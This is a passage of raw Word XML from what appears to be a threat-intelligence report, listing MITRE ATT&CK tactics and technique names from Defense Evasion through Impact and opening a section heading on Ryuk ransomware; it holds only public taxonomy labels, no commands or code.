        <w:t xml:space="preserve"> &lt;Create or Modify System Process&gt;:Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B96380B"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF0DFA1"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0005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion ['T1222.001', 'T1553.002', 'T1078.002', 'T1562.001', 'T1055.001', 'T1078', 'T1027', 'T1070.004', 'T1036.004', 'T1112']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBFF0F7"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T1222.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;File and Directory Permissions Modification&gt;:Windows File and Directory Permissions Modification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718C0686"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T1553.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Subvert Trust Controls&gt;:Code Signing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E337DF"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T1078.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Domain Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE31CC8"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T1562.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Impair </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;:Disable or Modify Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D41C64"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T1055.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Process Injection&gt;:Dynamic-link Library Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69520C35"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAB2BF7"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r w:rsidRPr="00FC79E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FC79E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1027 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FC79E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C26CFC"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T1070.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:File Deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDBD99B"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5B41A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1036.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B41A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Masquerade Task or Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76381C3F"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1112 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Modify Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A09059"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lastRenderedPageBreak/>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access ['T1003.002', 'T1557.001', 'T1558.003', 'T1003.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CEA316"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T1003.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;OS Credential Dumping&gt;:Security Account Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D536D63"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T1557.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Adversary-in-the-Middle&gt;:LLMNR/NBT-NS Poisoning and SMB Relay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04986C79"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T1558.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Steal or Forge Kerberos Tickets&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kerberoasting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66861B06"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T1003.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;OS Credential Dumping&gt;:NTDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C79071"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery ['T1087.002', 'T1016', 'T1518.001', 'T1082', 'T1033', 'T1135', 'T1018']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFD2209" w14:textId="77777777" w:rsidR="006C2E7B" w:rsidRPr="005B41A3" w:rsidRDefault="006C2E7B" w:rsidP="00473904">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B41A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1087.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B41A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Account Discovery&gt;:Domain Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0F64B9"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1016 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Configuration Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6297E28C"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T1518.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Software Discovery&gt;:Security Software Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DB10CA"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1082 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Information Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1FFFDC"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1033 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Owner/User Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A752BF"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1135 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Share Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361E293A"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1018 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote System Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E20669E"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement ['T1210', 'T1021.002', 'T1021.006', 'T1021.001', 'T1570']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0D9F59"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1210 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation of Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A72560"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T1021.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:SMB/Windows Admin Shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74519A14"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T1021.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:Windows Remote Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7990F908"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T1021.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:Remote Desktop Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AEAD34"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1570 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D378320"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Collection ['T1557.001', 'T1074']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AE374B"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T1557.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Adversary-in-the-Middle&gt;:LLMNR/NBT-NS Poisoning and SMB Relay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678C1BD3"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r w:rsidRPr="001207D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001207D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1074 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001207D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data Staged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051456DB"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control ['T1071.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7854C3EE" w14:textId="77777777" w:rsidR="006C2E7B" w:rsidRPr="004A553D" w:rsidRDefault="006C2E7B" w:rsidP="00473904">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A553D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1071.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A553D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ED8063"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration ['T1048.003', 'T1041']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40634AC7"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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1048.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Exfiltration Over Alternative Protocol&gt;:Exfiltration Over Unencrypted Non-C2 Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3894F3" w14:textId="77777777" w:rsidR="006C2E7B" w:rsidRPr="006C2E7B"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 xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="001207D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001207D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1041 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001207D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration Over C2 Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B71441" w14:textId="77777777" w:rsidR="006C2E7B" w:rsidRPr="006C2E7B" w:rsidRDefault="006C2E7B" w:rsidP="00473904">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact ['T1489']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EC43DE" w14:textId="4790E39F" w:rsidR="006C2E7B" w:rsidRPr="005935F8" w:rsidRDefault="006C2E7B" w:rsidP="00473904">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1489 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Service Stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D35F30" w14:textId="16C119B0" w:rsidR="00392096" w:rsidRDefault="001F691A" w:rsidP="00392096">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="141" w:name="_Toc153480910"/>
      <w:r>
        <w:t xml:space="preserve">T1566.001, T1566.002 - </w:t>
      </w:r>
      <w:r w:rsidRPr="008F1B7B">
        <w:t xml:space="preserve">Big Game Hunting with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F1B7B">
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F1B7B">
        <w:t>: Another Lucrative Targeted Ransomware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="141"/>
      <w:r w:rsidRPr="005B4630">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF77554" w14:textId="77777777" w:rsidR="00392096" w:rsidRDefault="00392096" w:rsidP="00392096">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392096" w:rsidRPr="002D1D50" w14:paraId="58D5E1C9" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="435CD688" w14:textId="77777777" w:rsidR="00392096" w:rsidRPr="002D1D50" w:rsidRDefault="00392096" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="142" w:name="OLE_LINK14"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B9EF007" w14:textId="37D27AFA" w:rsidR="00392096" w:rsidRPr="002D1D50" w:rsidRDefault="004430D6" w:rsidP="00DE5441">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
